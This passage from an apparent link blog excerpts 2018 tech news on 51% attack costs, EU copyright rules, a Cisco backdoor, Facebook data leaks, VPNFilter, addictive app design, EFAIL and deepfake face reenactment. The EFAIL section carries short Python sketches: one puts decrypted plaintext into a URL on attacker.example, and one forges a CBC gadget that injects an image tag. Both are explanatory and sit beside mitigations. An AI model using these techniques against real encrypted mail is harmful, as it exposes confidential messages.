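The arithmetic behind such estimates is straightforward: the hourly attack cost is roughly the network’s total hashrate multiplied by the marketplace’s rental price per hash, times 3,600 seconds. The figures in the sketch below are made-up placeholders, not Crypto51’s or NiceHash’s real numbers.

```python
# Back-of-envelope 51% attack cost, in the spirit of Crypto51.
# Both figures below are illustrative placeholders, not real market data.
network_hashrate = 300e6        # total network hashrate, hashes per second (hypothetical)
rental_price_per_hash = 2.5e-9  # marketplace price, USD per hash (hypothetical)

hourly_cost = network_hashrate * rental_price_per_hash * 3600
print(f"Renting hashpower to match this network for one hour: ~${hourly_cost:,.0f}")
# To out-mine the honest network you need slightly more than 100% of its current hashrate.
```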

“If your savings are in a coin, or anything else, that costs less than $1 million a day to attack, you should reconsider what you are doing,” tweeted Cornell professor Emin Gün Sirer.

On the other hand, larger cryptocurrencies such as bitcoin and ethereum are harder to 51% attack because they’re much larger, requiring more hashing power than NiceHash has available.

“Bitcoin is too big and there isn’t enough spare bitcoin mining capacity sitting around to pull off the attack,” Bonneau told CoinDesk.

Source: Blockchain’s Once-Feared 51% Attack Is Now Becoming Regular – Telegraph

EU Copyright law could put end to net memes

Memes, remixes and other user-generated content could disappear online if the EU’s proposed rules on copyright become law, warn experts.

Digital rights groups are campaigning against the Copyright Directive, which the European Parliament will vote on later this month.

The legislation aims to protect rights-holders in the internet age.

But critics say it misunderstands the way people engage with web content and risks excessive censorship.

The Copyright Directive is an attempt to reshape copyright for the internet, in particular rebalancing the relationship between copyright holders and online platforms.

Article 13 states that platform providers should “take measures to ensure the functioning of agreements concluded with rights-holders for the use of their works”.

Critics say this will, in effect, require all internet platforms to filter all content put online by users, which many believe would be an excessive restriction on free speech.

There is also concern that the proposals will rely on algorithms that will be programmed to “play safe” and delete anything that creates a risk for the platform.

A campaign against Article 13 – Copyright 4 Creativity – said that the proposals could “destroy the internet as we know it”.

“Should Article 13 of the Copyright Directive be adopted, it will impose widespread censorship of all the content you share online,” it said.

It is urging users to write to their MEP ahead of the vote on 20 June.

Jim Killock, executive director of the UK’s Open Rights Group, told the BBC: “Article 13 will create a ‘Robo-copyright’ regime, where machines zap anything they identify as breaking copyright rules, despite legal bans on laws that require ‘general monitoring’ of users to protect their privacy.

“Unfortunately, while machines can spot duplicate uploads of Beyonce songs, they can’t spot parodies, understand memes that use copyright images, or make any kind of cultural judgement about what creative people are doing. We see this all too often on YouTube already.

Source: Copyright law could put end to net memes – BBC News

Cisco Removes Backdoor Account, Fourth in the Last Four Months

For the fourth time in as many months, Cisco has removed hardcoded credentials that were left inside one of its products, which an attacker could have exploited to gain access to devices and inherently to customer networks.

This time around, the hardcoded password was found in Cisco’s Wide Area Application Services (WAAS), which is a software package that runs on Cisco hardware that can optimize WAN traffic management.

Hardcoded SNMP community string

This backdoor mechanism (CVE-2018-0329) was in the form of a hardcoded, read-only SNMP community string in the configuration file of the SNMP daemon.

[…]

The string came to light by accident, while security researcher Aaron Blair from RIoT Solutions was researching another WAAS vulnerability (CVE-2018-0352).

This second vulnerability was a privilege escalation in the WAAS disk check tool that allowed Blair to elevate his account’s access level from “admin” to “root.” Normally, Cisco users are permitted only admin access. The root user level grants access to the underlying OS files and is typically reserved for Cisco engineers.

By using his newly granted root-level access, Blair says he was able to spot the hidden SNMP community string inside the /etc/snmp/snmpd.conf file.

“This string can not be discovered or disabled without access to the root filesystem, which regular administrative users do not have under normal circumstances,” Blair says.

Source: Cisco Removes Backdoor Account, Fourth in the Last Four Months

The first 3D printed houses will be built in the Netherlands this year

The city of Eindhoven soon hopes to boast the world’s first commercially-developed 3D-printed homes, an endeavor known as Project Milestone.

Artist’s rendering of 3D printed home neighborhood. (3dprintedhouse.nl)

Construction on the first home begins this year and five houses will be on the rental market by 2019, project organizers say. Within a week of releasing images of the new homes, 20 families expressed interest in dwelling in these postmodern pods, according to the project website.

“The first aim of the project is to build five great houses that are comfortable to live in and will have happy occupants,” developers say. Beyond that, they hope to promote 3D concrete printing science and technology so that printed housing “will soon be a reality that is widely adopted.”

3D printed concrete. (3dprintedhouses.nl)

The “printer” in this case is a big robotic arm that will shape cement of a light, whipped-cream consistency, based on an architect’s design. The cement is layered for strength.

Source: The first 3D printed houses will be built in the Netherlands this year — Quartz

Facebook gave some companies special access to data on users’ friends

Facebook granted a select group of companies special access to its users’ records even after the point in 2015 at which the company claims it stopped sharing such data with app developers.

According to the Wall Street Journal, which cited court documents, unnamed Facebook officials and other unnamed sources, Facebook made special agreements with certain companies called “whitelists,” which gave them access to extra information about a user’s friends. This includes data such as phone numbers and “friend links,” which measure the degree of closeness between users and their friends.

These deals were made separately from the company’s data-sharing agreements with device manufacturers such as Huawei, which Facebook disclosed earlier this week after a New York Times report on the arrangement.

Source: Facebook gave some companies special access to data on users’ friends

Ticketfly exposes data on 27m customers in hack

  • Ticketfly was the target of a malicious cyber attack last week
  • In consultation with third-party forensic cybersecurity experts we can now confirm that credit and debit card information was not accessed.
  • However, information including names, addresses, email addresses and phone numbers connected to approximately 27 million Ticketfly accounts was accessed. It’s important to note that many people purchase tickets with multiple email accounts, so the number of individuals impacted is likely lower.
  • We take privacy and security very seriously and upon first learning about this incident we took swift action to secure the data of our clients and fans.
  • Ticketfly.com, Ticketfly Backstage, and the vast majority of temporary venue/promoter websites are back online.

Source: Ticketfly | Ticketfly Cyber Incident Update

The hits keep coming for Facebook: Web giant made 14m people’s private posts public

about 14 million people were affected by a bug that, for a nine-day span between May 18 and 27, caused profile posts to be set as public by default, allowing any Tom, Dick or Harriet to view the material.

“We recently found a bug that automatically suggested posting publicly when some people were creating their Facebook posts. We have fixed this issue and starting today we are letting everyone affected know and asking them to review any posts they made during that time,” Facebook chief privacy officer Erin Egan said in a statement to The Register.

Source: The hits keep coming for Facebook: Web giant made 14m people’s private posts public • The Register

VPNFilter router malware is a lot worse than everyone thought

ASUS, D-Link, Huawei, Ubiquiti, UPVEL, and ZTE: these are the vendors newly-named by Cisco’s Talos Intelligence as being exploited by the malware scum running the VPNFilter attacks, and the attack’s been spotted hitting endpoints behind vulnerable kit.

As well as the expanded list of impacted devices, Talos warned that VPNFilter now attacks endpoints behind the firewall, and now sports a “poison pill” to destroy an infected device if necessary.

When first discovered, VPNFilter was spotted in half a million devices – but only SOHO devices from Linksys, MikroTik, Netgear, TP-Link, and QNAP storage kit.

As well as the six new vendors added to the list, Talos said more devices from Linksys, MikroTik, Netgear, and TP-Link are affected. Talos noted that to date, all the vulnerable units are consumer-grade or SOHO-grade.

All in all, it seems the early VPNFilter attacks amounted to a dry run to see if there were enough vulnerable boxen to make the effort worthwhile.

Source: VPNFilter router malware is a lot worse than everyone thought • The Register

How programmers addict you to social media, games and your mobile phone

If you look at the current climate, the largest companies are the ones that hook you into their channel, whether it is a game, a website, shopping or social media. Quite a lot of research has been done into how much time we spend watching TV and looking at our mobiles, showing differing numbers, all of which are surprisingly high. The New York Post says Americans check their phones 80 times per day, The Daily Mail says 110 times, Inc has a study from Qualtrics and Accel with 150 times, and Business Insider has people touching their phones 2,617 times per day.

This is nurtured behaviour, and there is quite a bit of study on exactly how they do it:

Social Networking Sites and Addiction: Ten Lessons Learned (academic paper)
Online social networking sites (SNSs) have gained increasing popularity in the last decade, with individuals engaging in SNSs to connect with others who share similar interests. The perceived need to be online may result in compulsive use of SNSs, which in extreme cases may result in symptoms and consequences traditionally associated with substance-related addictions. In order to present new insights into online social networking and addiction, in this paper, 10 lessons learned concerning online social networking sites and addiction based on the insights derived from recent empirical research will be presented. These are: (i) social networking and social media use are not the same; (ii) social networking is eclectic; (iii) social networking is a way of being; (iv) individuals can become addicted to using social networking sites; (v) Facebook addiction is only one example of SNS addiction; (vi) fear of missing out (FOMO) may be part of SNS addiction; (vii) smartphone addiction may be part of SNS addiction; (viii) nomophobia may be part of SNS addiction; (ix) there are sociodemographic differences in SNS addiction; and (x) there are methodological problems with research to date. These are discussed in turn. Recommendations for research and clinical applications are provided.

Hooked: How to Build Habit-Forming Products (Book)
Why do some products capture widespread attention while others flop? What makes us engage with certain products out of sheer habit? Is there a pattern underlying how technologies hook us?

Nir Eyal answers these questions (and many more) by explaining the Hook Model—a four-step process embedded into the products of many successful companies to subtly encourage customer behavior. Through consecutive “hook cycles,” these products reach their ultimate goal of bringing users back again and again without depending on costly advertising or aggressive messaging.

7 Ways Facebook Keeps You Addicted (and how to apply the lessons to your products) (article)

One of the key reasons why it is so addictive is “operant conditioning”. It is based upon the scientific principle of variable rewards, discovered by B. F. Skinner (an early exponent of the school of behaviourism) in the 1930s when performing experiments with rats.

The secret?

Not rewarding all actions but only randomly.

Most of our emails are boring business emails and occasionally we find an enticing email that keeps us coming back for more. That’s variable reward.

That’s one way Facebook creates addiction.

Behavioral Game Design (article)

Every computer game is designed around the same central element: the player. While the hardware and software for games may change, the psychology underlying how players learn and react to the game is a constant. The study of the mind has actually come up with quite a few findings that can inform game design, but most of these have been published in scientific journals and other esoteric formats inaccessible to designers. Ironically, many of these discoveries used simple computer games as tools to explore how people learn and act under different conditions.

The techniques that I’ll discuss in this article generally fall under the heading of behavioral psychology. Best known for the work done on animals in the field, behavioral psychology focuses on experiments and observable actions. One hallmark of behavioral research is that most of the major experimental discoveries are species-independent and can be found in anything from birds to fish to humans. What behavioral psychologists look for (and what will be our focus here) are general “rules” for learning and for how minds respond to their environment. Because of the species- and context-free nature of these rules, they can easily be applied to novel domains such as computer game design. Unlike game theory, which stresses how a player should react to a situation, this article will focus on how they really do react to certain stereotypical conditions.

What is being offered here is not a blueprint for perfect games; it is a primer on some of the basic ways people react to different patterns of rewards. Every computer game is implicitly asking its players to react in certain ways. Psychology can offer a framework and a vocabulary for understanding what we are already telling our players.

5 Creepy Ways Video Games Are Trying to Get You Addicted (article)

The Slot Machine in Your Pocket (brilliant article!)

When we get sucked into our smartphones or distracted, we think it’s just an accident and our responsibility. But it’s not. It’s also because smartphones and apps hijack our innate psychological biases and vulnerabilities.

I learned about our minds’ vulnerabilities when I was a magician. Magicians start by looking for blind spots, vulnerabilities and biases of people’s minds, so they can influence what people do without them even realizing it. Once you know how to push people’s buttons, you can play them like a piano. And this is exactly what technology does to your mind. App designers play your psychological vulnerabilities in the race to grab your attention.

I want to show you how they do it, and offer hope that we have an opportunity to demand a different future from technology companies.

If you’re an app, how do you keep people hooked? Turn yourself into a slot machine.

There is also a backlash against these techniques.

How Technology is Hijacking Your Mind — from a Magician and Google Design Ethicist

I’m an expert on how technology hijacks our psychological vulnerabilities. That’s why I spent the last three years as a Design Ethicist at Google caring about how to design things in a way that defends a billion people’s minds from getting hijacked.

Humanetech.com

Technology is hijacking our minds and society.

Our world-class team of deeply concerned former tech insiders and CEOs intimately understands the culture, business incentives, design techniques, and organizational structures driving how technology hijacks our minds.

Since 2013, we’ve raised awareness of the problem within tech companies and for millions of people through broad media attention, convened top industry executives, and advised political leaders. Building on this start, we are advancing thoughtful solutions to change the system.

Why is this problem so urgent?

Technology that tears apart our common reality and truth, constantly shreds our attention, or causes us to feel isolated makes it impossible to solve the world’s other pressing problems like climate change, poverty, and polarization.

No one wants technology like that. Which means we’re all actually on the same team: Team Humanity, to realign technology with humanity’s best interests.

What is Time Well Spent (Part I): Design Distinctions

With Time Well Spent, we want technology that cares about helping us spend our time, and our lives, well – not seducing us into the most screen time, always-on interruptions or distractions.

So, people ask, “Are you saying that you know how people should spend their time?” Of course not. Let’s first establish what Time Well Spent isn’t:

It is not a universal, normative view of how people should spend their time
It is not saying that screen time is bad, or that we should turn it all off.
It is not saying that specific categories of apps (like social media or games) are bad.

EFAIL: PGP and S/MIME (encrypted email) are no longer safe

EFAIL describes vulnerabilities in the end-to-end encryption technologies OpenPGP and S/MIME that leak the plaintext of encrypted emails.
Email is a plaintext communication medium whose communication paths are partly protected by Transport Layer Security (TLS). For people in hostile environments (journalists, political activists, whistleblowers, …) who depend on the confidentiality of digital communication, this may not be enough. Powerful attackers such as nation state agencies are known to eavesdrop on email communications of a large number of people. To address this, OpenPGP offers end-to-end encryption specifically for sensitive communication in view of these powerful attackers. S/MIME is an alternative standard for email end-to-end encryption that is typically used to secure corporate email communication.

The EFAIL attacks exploit vulnerabilities in the OpenPGP and S/MIME standards to reveal the plaintext of encrypted emails. In a nutshell, EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs. To create these exfiltration channels, the attacker first needs access to the encrypted emails, for example, by eavesdropping on network traffic, compromising email accounts, email servers, backup systems or client computers. The emails could even have been collected years ago.

The attacker changes an encrypted email in a particular way and sends this changed encrypted email to the victim. The victim’s email client decrypts the email and loads any external content, thus exfiltrating the plaintext to the attacker.

 

Direct Exfiltration

There are two different flavors of EFAIL attacks. First, the direct exfiltration attack abuses vulnerabilities in Apple Mail, iOS Mail and Mozilla Thunderbird to directly exfiltrate the plaintext of encrypted emails. These vulnerabilities can be fixed in the respective email clients. The attack works like this. The attacker creates a new multipart email with three body parts as shown below. The first is an HTML body part essentially containing an HTML image tag. Note that the src attribute of that image tag is opened with quotes but not closed. The second body part contains the PGP or S/MIME ciphertext. The third is an HTML body part again that closes the src attribute of the first body part.

The attacker now sends this email to the victim. The victim’s client decrypts the encrypted second body part and stitches the three body parts together into one HTML email. Note that the src attribute of the image tag opened in the first body part is only closed by the third, so the resulting URL spans the decrypted plaintext in between.

The email client then URL-encodes all non-printable characters (a space becomes %20, for example) and requests an image from that URL. As the path of the URL contains the plaintext of the encrypted email, the victim’s email client sends the plaintext to the attacker.
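For intuition, a tiny Python sketch of that encoding step, with a made-up plaintext and attacker URL:

    # The decrypted plaintext ends up percent-encoded in the URL path of
    # the image request. URL and plaintext below are purely illustrative.
    from urllib.parse import quote

    plaintext = "secret meeting at 9 pm"   # stands in for the decrypted email
    url = "http://attacker.example/" + quote(plaintext)
    print(url)  # http://attacker.example/secret%20meeting%20at%209%20pm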

The direct exfiltration EFAIL attacks work for encrypted PGP as well as S/MIME emails.

The CBC/CFB Gadget Attack

Second, we describe the novel CBC/CFB gadget attacks, which abuse vulnerabilities in the specification of OpenPGP and S/MIME to exfiltrate the plaintext. The idea of CBC gadgets in S/MIME is as follows. Because of how the CBC mode of operation works, an attacker can precisely modify plaintext blocks if she knows the plaintext. S/MIME encrypted emails usually start with “Content-type: multipart/signed”, so the attacker knows at least one full block of plaintext. From this she can form a canonical plaintext block whose content is all zeros; we call the resulting block pair X and C0 a CBC gadget. She then repeatedly appends CBC gadgets to inject an image tag into the encrypted plaintext. This creates a single encrypted body part that exfiltrates its own plaintext when the user opens the attacker’s email. OpenPGP uses the CFB mode of operation, which has the same cryptographic properties as CBC and allows the same attack using CFB gadgets.
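As a hedged illustration of the CBC malleability this relies on (not the researchers' code), the sketch below shows how an attacker who knows a single 16-byte plaintext block can, without the key, craft a block pair that decrypts to content of her choosing, such as the start of an image tag:

    # Minimal sketch of the CBC property behind the "CBC gadget". Key,
    # known plaintext and injected HTML are illustrative placeholders.
    import os
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    key, iv = os.urandom(16), os.urandom(16)
    known_plain = b"Content-type: mu"      # guessable 16-byte S/MIME prefix
    enc = Cipher(algorithms.AES(key), modes.CBC(iv)).encryptor()
    c1 = enc.update(known_plain) + enc.finalize()   # first ciphertext block

    # Without the key, craft a fake "previous block" X so that the pair
    # (X, c1) decrypts to a chosen block, e.g. the start of an image tag.
    chosen = b'<img src="http:/'           # exactly 16 bytes of injected HTML
    xor = lambda a, b: bytes(x ^ y for x, y in zip(a, b))
    X = xor(xor(iv, known_plain), chosen)

    # The victim's client, which does hold the key, decrypts the gadget:
    dec = Cipher(algorithms.AES(key), modes.CBC(X)).decryptor()
    print(dec.update(c1) + dec.finalize())  # b'<img src="http:/'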

The difference from the direct exfiltration attack is that any standards-conforming client is vulnerable, and each vendor may devise its own mitigations, which may or may not prevent the attacks. In the long term it is therefore necessary to update the specifications themselves so that the underlying root causes of the vulnerabilities are fixed and documented.

While the CBC/CFB gadget attacks on PGP and S/MIME are technically very similar, the requirements for a successful attack differ substantially. Attacking S/MIME is straightforward, and an attacker can break multiple (in our tests up to 500) S/MIME encrypted emails by sending a single crafted S/MIME email to the victim. Given the current state of our research, the CFB gadget attack against PGP only has a success rate of approximately one in three attempts. The reason is that PGP compresses the plaintext before encrypting it, which complicates guessing known plaintext bytes. We see this not as a fundamental limitation of the EFAIL attacks but as a technical hitch, and expect the attacks to become more efficient in future research.

Mitigations

Here are some strategies to prevent EFAIL attacks:

Short term: No decryption in the email client. The best way to prevent EFAIL attacks is to decrypt S/MIME or PGP emails only in a separate application outside of your email client. Start by removing your S/MIME and PGP private keys from your email client, then decrypt incoming encrypted emails by copying and pasting the ciphertext into a separate application that does the decryption for you. That way, the email client cannot open exfiltration channels. This is currently the safest option, with the downside that the process becomes more involved.

Short term: Disable HTML rendering. The EFAIL attacks abuse active content, mostly in the form of HTML images, styles, and so on. Disabling the rendering of incoming HTML emails in your email client closes the most prominent EFAIL attack vector. Note that there are other possible back channels in email clients that are not related to HTML, but these are more difficult to exploit.

Medium term: Patching. Some vendors will publish patches that either fix the EFAIL vulnerabilities or make them much harder to exploit.

Long term: Update OpenPGP and S/MIME standards. The EFAIL attacks exploit flaws and undefined behavior in the MIME, S/MIME, and OpenPGP standards. Therefore, the standards need to be updated, which will take some time.

Source: EFAIL

Uh oh! Here’s yet more AI that creates creepy fake talking heads

Video Machine-learning experts have built a neural network that can manipulate facial movements in videos to create fake footage – in which people appear to say something they never actually said.

It could be used to create convincing yet faked announcements and confessions seemingly uttered by the rich and powerful as well as the average and mediocre, producing a new class of fake news and further separating us all from reality… if it works well enough, naturally.

It’s not quite like Deepfakes, which perversely superimposed the faces of famous actresses and models onto the bodies of raunchy X-rated movie stars.

Instead of mapping faces onto different bodies, this latest AI technology controls the target’s face, manipulating it to copy the head movements and facial expressions of a source. In one of the examples, Barack Obama acts as the source and Vladimir Putin as the target, so it looks as though a speech given by Obama was instead delivered by Putin.


Obama’s facial expressions are mapped onto Putin’s face using this latest AI technique … Image credit: Hyeongwoo Kim et al

A paper describing the technique, which popped up online at the end of last month, claims to produce realistic results. The method was developed by Hyeongwoo Kim, Pablo Garrido, Ayush Tewari, Weipeng Xu, Justus Thies, Matthias Nießner, Patrick Pérez, Christian Richardt, Michael Zollhöfer, and Christian Theobalt.

The Deepfakes Reddit forum, which has since been shut down, was flooded with people posting tragically bad computer-generated videos of celebs’ blurry and twitchy faces pasted onto porno babes using machine-learning software, with mismatched eyebrows and skittish movements. You could, after a few seconds, tell they were bogus, basically.

A previous, similar project created a video of someone appearing to say something he or she hadn’t, by lip-syncing footage to an audio clip. Again, the researchers used Barack Obama as an example. But the results weren’t completely convincing, since the lip movements didn’t always align properly.

That’s less of a problem with this new approach, however. It’s, supposedly, the first model that can transfer the full three-dimensional head position, head rotation, face expression, eye gaze and blinking from a source onto a portrait video of a target, according to the paper.

Controlling the target head

It uses a series of facial landmarks to reconstruct and track the head and facial movements, capturing the facial expressions in both the input source video and the output target video for every frame. A face representation method then computes the face parameters for both videos.

Next, these parameters are slightly modified and copied from the source to the target face for a realistic mapping. Synthetic images of the target’s face are rendered using an Nvidia GeForce GTX Titan X GPU.

The rendering part is where the generative adversarial network comes in. The training data comes from the tracked video frames of the target video sequence. The goal is to generate fake images that are good enough to pass for the real target video frames and trick a discriminator network.

Only about two thousand frames – which amounts to a minute of footage – are enough to train the network. At the moment, only the facial expressions can be modified realistically. The method doesn’t copy the upper body, and cannot deal with backgrounds that change too much.
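To make the adversarial rendering step a bit more concrete, here is a hedged PyTorch-style sketch of one conditional-GAN training step of the kind described above; the generator, discriminator, optimizers and tensors are assumptions, not the authors’ code:

    # One GAN training step for the rendering stage: the generator turns
    # modified face parameters into a frame, and the discriminator (assumed
    # to output probabilities) compares it with the real tracked target frame.
    import torch
    import torch.nn.functional as F

    def gan_step(generator, discriminator, face_params, real_frame, g_opt, d_opt):
        fake_frame = generator(face_params)

        # Discriminator update: real frames -> 1, rendered frames -> 0
        d_real = discriminator(real_frame)
        d_fake = discriminator(fake_frame.detach())
        d_loss = (F.binary_cross_entropy(d_real, torch.ones_like(d_real)) +
                  F.binary_cross_entropy(d_fake, torch.zeros_like(d_fake)))
        d_opt.zero_grad(); d_loss.backward(); d_opt.step()

        # Generator update: fool the discriminator and stay close to the target
        d_fake = discriminator(fake_frame)
        g_loss = (F.binary_cross_entropy(d_fake, torch.ones_like(d_fake)) +
                  F.l1_loss(fake_frame, real_frame))
        g_opt.zero_grad(); g_loss.backward(); g_opt.step()
        return d_loss.item(), g_loss.item()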

Source: Uh oh! Here’s yet more AI that creates creepy fake talking heads • The Register

AI learns to copy human gaming behaviour by watching YouTube

Deep reinforcement learning methods traditionally struggle with tasks where environment rewards are particularly sparse. One successful method of guiding exploration in these domains is to imitate trajectories provided by a human demonstrator. However, these demonstrations are typically collected under artificial conditions, i.e. with access to the agent’s exact environment setup and the demonstrator’s action and reward trajectories. Here we propose a two-stage method that overcomes these limitations by relying on noisy, unaligned footage without access to such data. First, we learn to map unaligned videos from multiple sources to a common representation using self-supervised objectives constructed over both time and modality (i.e. vision and sound). Second, we embed a single YouTube video in this representation to construct a reward function that encourages an agent to imitate human gameplay. This method of one-shot imitation allows our agent to convincingly exceed human-level performance on the infamously hard exploration games Montezuma’s Revenge, Pitfall! and Private Eye for the first time, even if the agent is not presented with any environment rewards.

Source: [1805.11592] Playing hard exploration games by watching YouTube
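The interesting part is the reward construction: rather than relying on the game’s sparse rewards, the agent is rewarded for reaching states whose embeddings match checkpoints taken along a single YouTube playthrough. A hedged NumPy sketch of that idea follows; the embed() encoder, sampling interval and distance threshold are placeholders, not the authors’ code:

    # Checkpoint-style imitation reward: embed every N-th frame of one
    # demonstration video; the agent earns +1 each time its observation
    # embedding comes close to the next unreached checkpoint.
    import numpy as np

    def make_checkpoints(video_frames, embed, every_n=16):
        """Embed every N-th demonstration frame as an ordered checkpoint list."""
        return [embed(f) for f in video_frames[::every_n]]

    def imitation_reward(obs_embedding, checkpoints, next_idx, threshold=0.5):
        """Return (reward, next_idx): +1 when the next checkpoint is reached."""
        if next_idx >= len(checkpoints):
            return 0.0, next_idx                 # demonstration exhausted
        if np.linalg.norm(obs_embedding - checkpoints[next_idx]) < threshold:
            return 1.0, next_idx + 1             # checkpoint reached
        return 0.0, next_idx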
